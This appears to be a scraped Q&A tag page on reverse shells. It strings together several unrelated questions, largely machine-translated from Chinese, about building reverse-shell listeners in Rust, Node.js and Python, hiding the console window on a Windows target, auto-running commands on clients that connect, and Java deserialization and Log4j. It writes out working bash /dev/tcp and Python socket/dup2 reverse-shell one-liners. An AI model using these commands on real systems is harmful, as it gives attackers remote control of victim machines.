问题标签 [reverse-shell]

我有这个 rust 反向外壳，它监听端口并等待连接。
然后我可以运行类似的东西/bin/bash -c 'bash -i >& /dev/tcp/0.0.0.0/55100 0>&1'来获得一个反向外壳。

一切正常，除了当我按下键盘上的向上箭头时它没有将最新的命令放入输入中，而是放入^[[A

正如你在这里看到的，它完美地运行了最新的命令！但它不会像在普通 shell 中那样将命令放入输入中。我猜那是因为它只在你按下回车时才向 shell 发送东西。

我已经尝试过像这样的 rustyline，但是当按下向上箭头或执行任何其他相关操作时，它删除了整个用户和目录（ [root@arch ~]$ ）。

因此，如果有可能在按下向上箭头而不使用 rustyline 并在本地存储历史记录时将最近的命令放入输入中？

所以它看起来像这样：

我正在寻求如何做的总结！
例如，当按下向上键时，它会实时更新输入。
基本上在按下向上键时实时更改输入，
例如rlwrap -cAr nc -lvnp 55100

我不想在按下输入时显示它，而是希望它实时出现在输入中

我在nodejs中做一个反向shell，它很好......但是有一个问题它无法从powershell保存当前位置，所以我吸进了脚本所在的文件夹，你可以在这个打印上看到netcat：https ://prnt.sc/14rm1yq

我当前的代码对 bash 反向 shell 的反应很奇怪，对于某些上下文，我试图在 ncat 中创建监听函数，但当前代码：

只是中断并回显发送的命令而不是响应有关如何修复它的任何想法？我正在尝试使其兼容 ncat 的所有内容

我正在使用这个简单的 python 反向 shell。

运行时，目标 Windows 系统上会弹出一个命令窗口。有没有办法隐藏它？

I'm working on a project that requires me to make a Python reverse listener that can send commands to a client that connects to my server, below is my server code and i am stuck on how to get multiple connections from more than just one client at the same time.

thank you

when i run this code it doesn't say the connection is established and it doesn't add the connection to the list i created. and lastly i'm trying to make all of this automated, as in, the second a client connects to my server listener, these commands will automatically run (ls, pwd, IP a...ect) and a file would be created to store all the data so i can check it out later. not sure where to start on that. thanks for helping

我在一家小型软件公司工作，我们使用本地安装的代理，该代理在 OSGI env 上运行，以收集有关服务器的数据并使用 ws hhtp 请求将它们发送到主服务器。通常我们使用sbe 协议对消息进行编码/解码，但它不适用于大于 50M 的消息（主服务器卡在 sbe 解码上），因此对于这种特殊情况，我发送了 Java 序列化对象，该对象将在服务器端进行反序列化。一个大客户在安装之前对我们的应用程序进行了大规模测试，它检测到以下内容：

/resource/save-data-upload-big-file 容易受到不安全的 java 反序列化的影响。

我们成功利用此漏洞在服务器上执行。

我不清楚他们是如何做到这一点的（远程代码执行），但他们建议使用另一种方法将收集到的数据传输到服务器。

我在考虑SealedObject ... RCE安全吗？提前致谢

我遇到了这个用 c 编写的反向 shell 代码。

我想了解它，所以我告诉自己有关文件描述符的信息，因为使用了 dup2。现在的问题是我不明白为什么。

socket 的手册页让我假设，stdin、stdout 和 stderr 正在被套接字取代。

[...] 成功调用返回的文件描述符将是当前未为进程打开的编号最小的文件描述符。

这个假设是真的吗？如果是，为什么要重置默认流？是因为下面的 execl("/bin/sh", NULL) 行，正如这个线程所暗示的那样？

我在 Centos 8 机器上安装了 Apache HTTP 服务器，我想知道它是否使用 Log4j 库，因为发现的新漏洞会危害网络上的许多服务器。如果是这样，解决的程序是什么？从我的分析中，我可以从存储库 (svn.apache.org/repos/asf/httpd/httpd/) 中看到使用的语言是 C、XML，所以我想它不使用 Log4j 来跟踪日志，而是投射那些与有源模块有关。谢谢你。

我对我在本地尝试的一个反向 shell 有疑问：

在手动尝试使用以下反向 shell 获取交互式 shell 的步骤后：

_

我试图做一个可以自动执行此操作的python服务器：

有人能弄清楚为什么我的命令没有执行但 shell 启动了（客户端）吗？

谢谢。

当我遇到以下代码片段时，我正在学习 python 和黑客技术：

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.20.14",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

这是获得反向外壳的外壳代码。我确实了解python代码，但我无法弄清楚它os.dup2()的用途以及它在那里做什么，在最后一行写着p=subprocess.call(["/bin/sh","-i"])，p变量是如何被执行的

如果可能的话，详细回答以及我可以做进一步研究的资源。